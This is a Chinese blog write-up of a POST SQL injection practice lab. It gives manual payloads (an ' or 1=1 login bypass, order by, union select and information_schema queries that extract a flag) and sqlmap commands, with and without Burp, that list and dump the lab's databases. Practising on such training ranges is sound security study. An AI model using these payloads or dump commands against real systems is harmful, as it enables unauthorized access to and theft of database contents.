POST注入靶场练习

题目1

使用手工注入

1、判断是否存在SQL注入

(1)admin'后直接使用-- qwe注释

(2)使用万能密码

admin     ' or 1=1 -- qwe

SQL注入成功

2、判断字段数

输入admin' order by 3 -- qwe和admin' order by 4 -- qwe,只有order by 3的时候可以输出,则字段数是3

3、查找回显点

admiiin' union select 1,2,3 -- qwe

ps:由于网站输出会输出数据库最上面一行数据,与union select 后的数据和admin原本数据冲突,所以代码最头上的需要输出一个不存在的值

4、利用系统自带库查找数据表和字段

admin' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1-- qwe

查找到flag数据表

查找到flag字段

admin' union select 1,column_name,3 from information_schema.columns where table_name='flag' and table_schema=database() limit 1,1-- qwe

5、查找数据

admin' union select 1,flag,3 from flag limit 1,1-- qwe,得到flag

 

题目二——使用sqlmap+burp

一、设置chorme插件SwitchySharp

http代理设置为本地127.0.0.1,端口自行设计

二、Burp中查看Proxy Listener

回显是127.0.0.1

三、开启抓包

在登录框随意输入内容,点击登录,Burp中抓取到数据包

 

四、使用sqlmap

(1)把Burp抓包的内容复制到sqlmap文件夹下的一个文本文档1.txt

ps:把需要知道的字段前添加*

(2)输入py -2 sqlmap.py -r 1.txt --level 3 --risk 2,确定查询信息

(3)查找数据库名

py -2 sqlmap.py -r 1.txt --dbs --level 3 --risk 2

(3)进入数据库,查看数据表

py -2 sqlmap.py -r 1.txt --D error --tables --level 3 --risk 2

(4)查看数据库内信息

py -2 sqlmap.py -r 1.txt --D error -T error_flag --dump --level 3 --risk 2

由于查询的error数据库中的flag都不是真的flag,我又去找了post_error库中的flag,方法同上,找到了flag

 

题目二——使用sqlmap的--form

(1)查看sql注入信息

py -2 sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-06/index.php --form --level 3 --risk 2

(2)查找数据库

py -2 sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-06/index.php --form --risk 2 --level 3 --dbs

剩下步骤和sqlmap+Burp方法一样

 

 

 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值